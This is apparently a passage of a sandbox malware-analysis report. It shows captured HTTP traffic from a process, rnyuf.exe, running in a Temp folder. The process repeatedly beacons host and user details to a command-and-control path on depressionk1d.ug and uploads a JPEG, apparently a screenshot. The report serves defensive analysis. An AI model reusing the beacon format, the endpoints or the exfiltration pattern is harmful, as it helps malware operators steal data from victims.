                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:40.693264961 CET6052INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:40 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          102192.168.2.449887178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:40.825269938 CET6052OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:40.848125935 CET6054INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:40 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:23:40.848155022 CET6054INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->
                          Nov 12, 2021 22:23:40.856478930 CET6054OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:40.856553078 CET6055OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:40.856748104 CET6065OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:40.856894970 CET6067OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:40.879489899 CET6069INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:40 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:23:40.879601002 CET6071OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:40.879652977 CET6082OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:40.879671097 CET6087OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:40.879698038 CET6093OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:40.902683020 CET6098OUTData Raw: 97 a3 cb 25 9f 95 a6 eb da 83 6a 2a d3 db 5a d9 48 86 68 ad d5 8a 6f 7c 44 db 98 95 63 b4 05 00 01 96 39 c8 ca d3 7c 49 a8 e9 10 df 18 59 e6 bc bd b9 86 e2 4b 99 9f 7e fd 82 40 ca e0 83 bc 38 90 83 93 d3 3d 73 57 a0 f1 3e 9d 15 f6 9f 70 de 1f 9c
                          Data Ascii: %j*ZHho|Dc9|IYK~@8=sW>p*_3OXo<F9b1$<V_#_5vE:59[p-fh8QqtAipD+7LgVQo4ZG*EqG|&Z3<#+F2]"
                          Nov 12, 2021 22:23:40.902761936 CET6119OUTData Raw: db d7 86 46 e4 a9 07 05 4f b8 39 15 c8 f8 f3 c3 1e 1f 9b c2 5a d6 a6 34 9b 2f b6 25 b4 92 ad c2 44 15 f7 80 79 24 75 39 f5 ae ec 2d 6a ca 5f bd 97 32 7e 49 1c b5 e8 41 2b 45 59 a3 e6 3a 28 a5 15 eb 1e 78 94 a0 52 e2 8e d4 c4 15 eb 1f 0a 3c 0b a0
                          Data Ascii: FO9Z4/%Dy$u9-j_2~IA+EY:(xR<F"4rpTq^O^E[@1]I1?|>ks3 6peJR:jG/zM]/+CdRu$[Y1I!o5v+u=5o+
                          Nov 12, 2021 22:23:40.902805090 CET6124OUTData Raw: 85 a7 53 69 d4 c9 14 74 a0 51 40 a0 4c 70 a5 a4 14 b4 f5 24 29 47 5a 29 28 01 f4 e1 4c 14 f1 4c 86 6e 78 74 13 35 c1 f4 8c ff 00 23 59 9f c4 6b 5b c3 43 2d 76 7d 23 fe 86 b2 bf 88 fd 6b 9a 9f f1 65 f2 2e b2 fd dc 45 a4 14 52 d6 e7 28 52 d0 28 a0
                          Data Ascii: SitQ@Lp$)GZ)(LLnxt5#Yk[C-v}#ke.ER(R(BR1ii(BIKHS)$u)Zu4Rb0q]&YN5MBgUTb}I5Ziv_^)sgKv_Y`Uyc5?)RO`[)+$!


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          103192.168.2.449888178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:40.994213104 CET6143OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:41.020926952 CET6143INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:41 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          104192.168.2.449889178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:41.150444984 CET6144OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:41.175699949 CET6144INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:41 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          105192.168.2.449890178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:41.321176052 CET6145OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:41.346884012 CET6145INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:41 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          106192.168.2.449891178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:41.408776045 CET6146OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:41.408941031 CET6146OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:41.409163952 CET6156OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:41.409296036 CET6159OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:41.431612015 CET6165OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:41.431667089 CET6170OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
